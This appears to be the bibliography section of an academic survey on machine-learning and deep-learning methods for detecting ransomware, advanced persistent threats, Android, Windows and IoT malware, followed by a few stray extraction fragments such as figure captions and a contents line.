[217] T. Halabi, O.A. Wahab, R. Al Mallah, M. Zulkernine, Protecting the internet of vehicles against advanced persistent threats: A Bayesian stackelberg game, IEEE Trans. Reliab. 70 (3) (2021) 970–985.
[218] Jaafer Al-Saraireh, Ala’ Masarweh, A novel approach for detecting advanced persistent threats, Egypt. Inform. J. (ISSN: 1110-8665) (2022).
[219] N. Scaife, H. Carter, P. Traynor, K.R.B. Butler, CryptoLock (and drop it): stopping ransomware attacks on user data, in: 2016 IEEE 36th International Conference on Distributed Computing Systems, ICDCS, IEEE, 2016.
[220] T. Dargahi, A. Dehghantanha, P.N. Bahrami, M. Conti, G. Bianchi, L. Benedetto, A cyber-kill-chain based taxonomy of crypto-ransomware features, J. Comput. Virol. Hacking Tech. 15 (4) (2019) 277–305.
[221] A. Kharraz, W. Robertson, E. Kirda, Protecting against ransomware: a new line of research or restating classic ideas? IEEE Secur. Priv. 16 (3) (2018) 103–107.
[222] A. Kharraz, S. Arshad, C. Mulliner, W. Robertson, E. Kirda, UNVEIL: a large-scale, automated approach to detecting ransomware, in: 25th USENIX Security Symposium (USENIX Security 2016), USENIX Association, Austin, TX, 2016, pp. 757–772.
[223] J.A. Gomez-Hernandez, L. Álvarez-González, P. García-Teodoro, R-Locker: thwarting ransomware action through a honeyfile-based approach, Comput. Secur. 73 (2018) 389–398.
[224] B.A.S. Al-rimy, M.A. Maarof, Y.A. Prasetyo, S.Z.M. Shaid, A.F.M. Ariffin, Zero-day aware decision fusion-based model for crypto-ransomware early detection, Int. J. Integr. Eng. 10 (6) (2018) 82–88.
[225] T. Honda, K. Mukaiyama, T. Shirai, T. Ohki, M. Nishigaki, Ransomware detection considering user’s document editing, in: 2018 IEEE 32nd International Conference on Advanced Information Networking and Applications, AINA, IEEE, 2018.
[226] S. Jung, Y. Won, Ransomware detection method based on context-aware entropy analysis, Soft Comput. 22 (20) (2018) 6731–6740.
[227] S. Mehnaz, A. Mudgerikar, E. Bertino, Rwguard: a real-time detection system against cryptographic ransomware, in: M. Bailey, T. Holz, M. Stamatogiannakis, S. Ioannidis (Eds.), RAID 2018, in: LNCS, vol. 11050, Springer, Cham, 2018, pp. 114–136.
[228] A. Continella, et al., ShieldFS: a self-healing, ransomware-aware filesystem, in: Proceedings of the 32nd Annual Conference on Computer Security Applications, ACSAC 2016, ACM, New York, 2016, pp. 336–347.
[229] G. Bottazzi, G.F. Italiano, D. Spera, Preventing ransomware attacks through file system filter drivers, in: Second Italian Conference on Cyber Security, Milan, Italy, 2018.
[230] D. Morato, E. Berrueta, E. Magaña, M. Izal, Ransomware early detection by the analysis of file sharing traffic, J. Netw. Comput. Appl. 124 (2018) 14–32.
[231] K. Cabaj, M. Gregorczyk, W. Mazurczyk, Software-defined networking-based crypto ransomware detection using HTTP traffic characteristics, Comput. Electr. Eng. 66 (2018) 353–368.
[232] K. Cabaj, W. Mazurczyk, Using software-defined networking for ransomware mitigation: the case of cryptowall, IEEE Netw. 30 (6) (2016) 14–20.
[233] D.F. Netto, K.M. Shony, E.R. Lalson, An integrated approach for detecting ransomware using static and dynamic analysis, in: 2018 International CET Conference on Control, Communication, and Computing (IC4), IEEE, 2018.
[234] O.M.K. Alhawi, J. Baldwin, A. Dehghantanha, Leveraging machine learning techniques for windows ransomware network traffic detection, in: A. Dehghantanha, M. Conti, T. Dargahi (Eds.), Cyber Threat Intelligence, in: AIS, vol. 70, Springer, Cham, 2018, pp. 93–106.
[235] J.-Y. Paik, J.-H. Choi, R. Jin, J. Wang, E.-S. Cho, A storage-level detection mechanism against crypto-ransomware, in: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, CCS 2018, ACM Press, 2018.
[236] S.H. Baek, Y. Jung, A. Mohaisen, S. Lee, D. Nyang, SSD-insider: internal defence of the solid-state drive against ransomware with perfect data recovery, in: 2018 IEEE 38th International Conference on Distributed Computing Systems, ICDCS, IEEE, 2018.
[237] N.B. Harikrishnan, K.P. Soman, Detecting ransomware using GURLS, in: 2018 Second International Conference on Advances in Electronics, Computers and Communications, ICAECC, IEEE, 2018.
[238] A. Ferrante, M. Malek, F. Martinelli, F. Mercaldo, J. Milosevic, Extinguishing ransomware - a hybrid approach to android ransomware detection, in: A. Imine, J.M. Fernandez, J.-Y. Marion, L. Logrippo, J. Garcia-Alfaro (Eds.), FPS 2017, in: LNCS, vol. 10723, Springer, Cham, 2018, pp. 242–258.
[239] M. Scalas, D. Maiorca, F. Mercaldo, C.A. Visaggio, F. Martinelli, G. Giacinto, R-PackDroid: practical on-device detection of Android ransomware, 2018, CoRR, abs/1805.09563.
[240] S. Song, B. Kim, S. Lee, The effective ransomware prevention technique using process monitoring on Android platform, Mob. Inf. Syst. 2016 (2016) 1–9.
[241] J. Baldwin, A. Dehghantanha, Leveraging support vector machine for opcode density based detection of crypto-ransomware, in: A. Dehghantanha, M. Conti, T. Dargahi (Eds.), Cyber Threat Intelligence, in: AIS, vol. 70, Springer, Cham, 2018, pp. 107–136.
[242] A. Adamov, A. Carlsson, Reinforcement learning for anti-ransomware testing, in: 2020 IEEE East-West Design & Test Symposium, EWDTS, 2020, pp. 1–5.
[243] S. Homayoun, A. Dehghantanha, M. Ahmadzadeh, S. Hashemi, R. Khayami, Know abnormal, find evil: Frequent pattern mining for ransomware threat hunting and intelligence, IEEE Trans. Emerg. Top. Comput. 8 (2) (2020) 341–351.
[244] U. Urooj, M. Aizaini Bin Maarof, B. Ali Saleh Al-rimy, A proposed adaptive pre-encryption crypto-ransomware early detection model, in: 2021 3rd International Cyber Resilience Conference, CRC, 2021, pp. 1–6.
[245] D. Min, Y. Ko, R. Walker, J. Lee, Y. Kim, A content-based ransomware detection and backup solid-state drive for ransomware defence, IEEE Trans. Comput.-Aided Des. Integr. Circuits Syst. http://dx.doi.org/10.1109/TCAD.2021.3099084.
[246] F. Khan, C. Ncube, L.K. Ramasamy, S. Kadry, Y. Nam, A digital DNA sequencing engine for ransomware detection using machine learning, IEEE Access 8 (2020) 119710–119719.
[247] S. Sibi Chakkaravarthy, D. Sangeetha, M.V. Cruz, V. Vaidehi, B. Raman, Design of intrusion detection honeypot using social leopard algorithm to detect IoT ransomware attacks, IEEE Access 8 (2020) 169944–169956.
[248] M. Wazid, A.K. Das, S. Shetty, BSFR-SH: Blockchain-enabled security framework against ransomware attacks for smart healthcare, IEEE Trans. Consum. Electron. (2022).
[249] Ahmad O. Almashhadani, Domhnall Carlin, Mustafa Kaiiali, Sakir Sezer, MFMCNS: a multi-feature and multi-classifier network-based system for ransomworm detection, Comput. Secur. (ISSN: 0167-4048) 121 (2022) 102860.
[250] Eduardo Berrueta, Daniel Morato, Eduardo Magaña, Mikel Izal, Crypto-ransomware detection using machine learning models in file-sharing network scenarios with encrypted traffic, Expert Syst. Appl. (ISSN: 0957-4174) 209 (2022) 118299, http://dx.doi.org/10.1016/j.eswa.2022.118299.
[251] Masoudeh Keshavarzi, Hamid Reza Ghaffary, An ontology-driven framework for knowledge representation of digital extortion attacks, Comput. Hum. Behav. (ISSN: 0747-5632) 139 (2023) 107520.
[252] Liu Liu, Baosheng Wang, Automatic malware detection using deep learning based on static analysis, in: ICPCSEE 2017, Part I, CCIS 727, 2017, pp. 500–507.
[253] Y. Tang, Deep learning using linear support vector machines, 2013.
[254] K. Grosse, N. Papernot, P. Manoharan, M. Backes, P. McDaniel, Adversarial perturbations against deep neural networks for malware classification, 2016, arXiv:1606.04435.
[255] B. Kolosnjaji, A. Demontis, B. Biggio, D. Maiorca, G. Giacinto, C. Eckert, F. Roli, Adversarial malware binaries: Evading deep learning for malware detection in executables, in: Proc. 26th Eur. Signal Process. Conf., EUSIPCO, 2018.
[256] P. Prasse, L. Machlica, T. Pevný, J. Havelka, T. Scheffer, Malware detection by analysing encrypted network traffic with neural networks, in: M. Ceci, J. Hollmén, L. Todorovski, C. Vens, S. Džeroski (Eds.), Machine Learning and Knowledge Discovery in Databases, Springer International Publishing, Cham, 2017, pp. 73–88.
[257] M. AL-Hawawreh, N. Moustafa, E. Sitnikova, Identification of malicious activities in industrial internet of things based on deep learning models, J. Inf. Secur. Appl. 41 (2018) 1–11.
[258] N. Kumar, S. Mukhopadhyay, M. Gupta, A. Handa, K.S. Shukla, Malware classification using early-stage behavioral analysis, in: 2019 14th Asia Joint Conference on Information Security (AsiaJCIS), 2019, pp. 16–23.
[259] M. Rhode, L. Tuson, P. Burnap, K. Jones, Lab to soc: robust features for dynamic malware detection, in: 2019 49th Annual IEEE/IFIP International Conference on Dependable Systems and Networks Industry Track, 2019, pp. 13–16.
[260] X. Huang, L. Ma, W. Yang, et al., A method for windows malware detection based on deep learning, J. Signal Process. Syst. 93 (2021) 265–273.
[261] S. Tobiyama, Y. Yamaguchi, H. Shimada, T. Ikuse, T. Yagi, Malware detection with deep neural network using process behavior, in: 2016 IEEE 40th Annual Computer Software and Applications Conference (COMPSAC), Vol. 2, 2016, pp. 577–582.
[262] R. Ronen, M. Radu, C.E. Feuerstein, E. Yomtov, M. Ahmadi, Microsoft Malware classification challenge, Cryptogr. Secur. (2018) arXiv.


[263] T. Mikolov, I. Sutskever, K. Chen, G.S. Corrado, J. Dean, Distributed representations of words and phrases and their compositionality, in: Advances in Neural Information Processing Systems, 2013, pp. 3111–3119.
[264] Francesco Mercaldo, Antonella Santone, Deep learning for image-based mobile malware detection, J. Comput. Virol. Hacking Tech. (2020).
[265] K. Bakour, H.M. Ünver, VisDroid: Android malware classification based on local and global image features, a bag of visual words and machine learning techniques, Neural Comput. Appl. (2020).
[266] I. Almomani, A. Alkhayer, W. El-Shafai, An automated vision-based deep learning model for efficient detection of android malware attacks, IEEE Access 10 (2022) 2700–2720.
[267] B. Yuan, J. Wang, P. Wu, X. Qing, IoT Malware classification based on lightweight convolutional neural networks, IEEE Internet Things J. http://dx.doi.org/10.1109/JIOT.2021.3100063.
[268] Q. Li, J. Mi, W. Li, J. Wang, M. Cheng, CNN-based malware variants detection method for internet of things, IEEE Internet Things J. http://dx.doi.org/10.1109/JIOT.2021.3075694.
[269] https://gs.statcounter.com/osmarketshare/mobile/worldwide.
[270] F. Wei, S. Roy, X. Ou, et al., Amandroid: a precise and general inter-component data flow analysis framework for security vetting of android apps, in: Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security, ACM, 2014, pp. 1329–1341.
[271] Z. Yuan, Y. Lu, Y. Xue, Droiddetector: android malware characterization and detection using deep learning, Tsinghua Sci. Technol. 21 (01) (2016) 114–123.
[272] R. Feng, S. Chen, X. Xie, G. Meng, S.-W. Lin, Y. Liu, A performance-sensitive malware detection system using deep learning on mobile devices, IEEE Trans. Inf. Forensics Secur. 16 (2021) 1563–1578, http://dx.doi.org/10.1109/TIFS.2020.3025436.
[273] I.U. Haq, T.A. Khan, A. Akhunzada, A dynamic robust DL-based model for android malware detection, IEEE Access 9 (2021) 74510–74521.
[274] H.-I. Kim, M. Kang, S.-J. Cho, S.-I. Choi, Efficient deep learning network with multi-streams for android malware family classification, IEEE Access 10 (2022) 5518–5532.
[275] Z. Namrud, S. Kpodjedo, A. Bali, C. Talhi, Deep-layer clustering to identify permission usage patterns of android app categories, IEEE Access 10 (2022) 24240–24254.
[276] Abdullah Talha Kabakus, DroidMalwareDetector: A novel android malware detection framework based on convolutional neural network, Expert Syst. Appl. (ISSN: 0957-4174) 206 (2022) 117833.
[277] Arvind Mahindru, Amrit Sangal, SOMDROID: android malware detection by artificial neural network trained using unsupervised learning, Evol. Intell. 15 (2022) http://dx.doi.org/10.1007/s12065-020-00518-1.
[278] Junwei Tang, Ruixuan Li, Yu Jiang, Xiwu Gu, Yuhua Li, Android malware obfuscation variants detection method based on multi-granularity opcode features, Future Gener. Comput. Syst. (ISSN: 0167-739X) 129 (2022) 141–151.
[279] L. Xu, D. Zhang, N. Jayasena, J. Cavazos, HADM: Hybrid analysis for detection of malware, in: Y. Bi, S. Kapoor, R. Bhatia (Eds.), Proceedings of SAI Intelligent Systems Conference (IntelliSys) 2016. IntelliSys 2016, in: Lecture Notes in Networks and Systems, vol. 16, Springer, Cham, 2018.
[280] B. Anderson, D. Quist, J. Neil, C. Storlie, T. Lane, Graph-based malware detection using dynamic analysis, J. Comput. Virol. 7 (4) (2011) 247–258.
[281] S.L. SD, C.D. J, Windows malware detector using convolutional neural network based on visualization images, IEEE Trans. Emerg. Top. Comput.
[282] X. Huang, L. Ma, W. Yang, et al., A method for windows malware detection based on deep learning, J. Signal Process. Syst. (2020).
[283] W. Aslam, M.M. Fraz, S.K. Rizvi, S. Saleem, Optimizing features for malware-benign clustering using windows portable executables, in: 2021 International Conference on Artificial Intelligence, ICAI, 2021, pp. 28–32.
[284] O. Sharma, A. Sharma, A. Kalia, Windows and IoT malware visualization and classification with deep CNN and Xception CNN using Markov images, J. Intell. Inf. Syst. (2022).
[285] S.K.J. Rizvi, W. Aslam, M. Shahzad, et al., PROUD-MAL: static analysis-based progressive framework for deep unsupervised malware classification of windows portable executable, Complex Intell. Syst. 8 (2022) 673–685.
[286] C. Petrov, Internet of things statistics from 2019 to justify the rise of IoT, 2019, https://techjury.net/stats-about/internet-of-things-statistics/. Accessed 25 Oct 2019.
[287] L. Columbus, IoT market predicted to double by 2021, reaching $520b, 2018, https://www.forbes.com/sites/louiscolumbus/2018/08/16/iot-market-predicted-to-double-by-2021-reaching-520b/#768bbd9d1f94. Accessed 13 Dec 2019.
[288] J. Sakhnini, H. Karimipour, A. Dehghantanha, R.M. Parizi, G. Srivastava, Security aspects of internet of things aided smart grids: a bibliometric survey, Internet Things (2019) 100111.
[289] M. Binti Mohamad Noor, W.H. Hassan, Current research on internet of things (IoT) security: a survey, Comput. Netw. 148 (2019) 283–294.
[290] K.D.T. Nguyen, T.M. Tuan, S.H. Le, A.P. Viet, M. Ogawa, N. Le Minh, Comparison of three deep learning-based approaches for IoT malware detection, in: Proceedings of 2018 10th International Conference on Knowledge and Systems Engineering, KSE 2018, IEEE, 2018, pp. 382–388.
[291] H.S. Ham, H.H. Kim, M.S. Kim, M.J. Choi, Linear SVM-based android malware detection for reliable IoT services, J. Appl. Math. 2014 (2014) 594501.
[292] R. Kumar, X. Zhang, W. Wang, R.U. Khan, J. Kumar, A. Sharif, A multimodal malware detection technique for android IoT devices using various features, IEEE Access 7 (2019) 64411–64430.
[293] Z. Markel, M. Bilzor, Building a machine learning classifier for malware detection, in: WATeR 2014 - Proceedings of the 2014 2nd Workshop on Anti-Malware Testing Research, IEEE, 2015.
[294] R. Taheri, M. Shojafar, M. Alazab, R. Tafazolli, Fed-IIoT: A robust federated malware detection architecture in industrial IoT, IEEE Trans. Ind. Inform. 17 (12) (2021) 8442–8452.
[295] M. Panda, A.A.A. Mousa, A.E. Hassanien, Developing an efficient feature engineering and machine learning model for detecting IoT-botnet cyber attacks, IEEE Access 9 (2021) 91038–91052, http://dx.doi.org/10.1109/ACCESS.2021.3092054.
[296] S.A. Khowaja, P. Khuwaja, Q-learning and LSTM based deep active learning strategy for malware defence in industrial IoT applications, Multimed. Tools Appl. 80 (2021) 14637–14663.
[297] Regonda Nagaraju, Jupeth Toriano Pentang, Shokhjakhon Abdufattokhov, Ricardo Fernando CosioBorda, N. Mageswari, G. Uganya, Attack prevention in IoT through hybrid optimization mechanism and deep learning framework, Measurement: Sensors (ISSN: 2665-9174) 24 (2022) 100431.
[298] Rajasekhar Chaganti, Vinayakumar Ravi, Tuan D. Pham, Deep learning based cross architecture internet of things malware detection and classification, Comput. Secur. (ISSN: 0167-4048) 120 (2022) 102779.
[299] Santosh K. Smmarwar, Govind P. Gupta, Sanjay Kumar, Deep malware detection framework for IoT-based smart agriculture, Comput. Electr. Eng. (ISSN: 0045-7906) 104 (Part A) (2022) 108410.
[300] G.E. Hinton, Deep belief networks, Scholarpedia 4 (5) (2009) 5947.
[301] J. Hassannataj Joloudari, M. Haderbadi, A. Mashmool, M. Ghasemigol, S.S. Band, A. Mosavi, Early detection of the advanced persistent threat attack using performance analysis of deep learning, IEEE Access 8 (2020) 186125–186137.
[302] N. Mohamed, B. Belaton, SBI model for the detection of advanced persistent threat based on strange behavior of using credential dumping technique, IEEE Access 9 (2021) 42919–42932.
[303] Meaad Alrehaili, Adel Alshamrani, Ala Eshmawi, A hybrid deep learning approach for advanced persistent threat attack detection, in: The 5th International Conference on Future Networks & Distributed Systems (ICFNDS 2021), Association for Computing Machinery, New York, NY, USA, 2022, pp. 78–86.
[304] C. Do Xuan, M.H. Dao, A novel approach for APT attack detection based on combined deep learning model, Neural Comput. Appl. 33 (2021) 13251–13264.
[305] H. Li, J. Wu, H. Xu, G. Li, M. Guizani, Explainable intelligence-driven defence mechanism against advanced persistent threats: A joint edge game and AI approach, IEEE Trans. Dependable Secure Comput. 19 (2) (2022) 757–775.
[306] C. Do Xuan, D. Huong, A new approach for APT malware detection based on deep graph network for endpoint systems, Appl. Intell. 52 (2022) 14005–14024.
[307] S. Homayoun, et al., DRTHIS: deep ransomware threat hunting and intelligence system at the fog layer, Future Gener. Comput. Syst. 90 (2019) 94–104.
[308] M. Al-Hawawreh, E. Sitnikova, N. Aboutorab, Asynchronous peer-to-peer federated capability-based targeted ransomware detection model for industrial IoT, IEEE Access 9 (2021) 148738–148755.
[309] X. Zhang, J. Wang, S. Zhu, Dual generative adversarial networks based unknown encryption ransomware attack detection, IEEE Access 10 (2022) 900–913.


5.4. IoT malware detection techniques ...................................................................................................................................................................... 16

detecting malware that uses signatures are frequently employed.

Fig. 1. Taxonomy of research.

Fig. 2. Deep Learning architecture.

Fig. 3. Deep Neural Network (DNN).

Fig. 4. Convolutional Neural Network (CNN).

Fig. 5. Recurrent Neural Network (RNN).

Fig. 6. Malware detection process based on image processing.

Fig. 7. IoT Malware detection using ML classifiers.

Fang et al. (2019) [60] PE, RL Static DQEAF

• The Internet of Things is expanding since every gadget is

Data availability
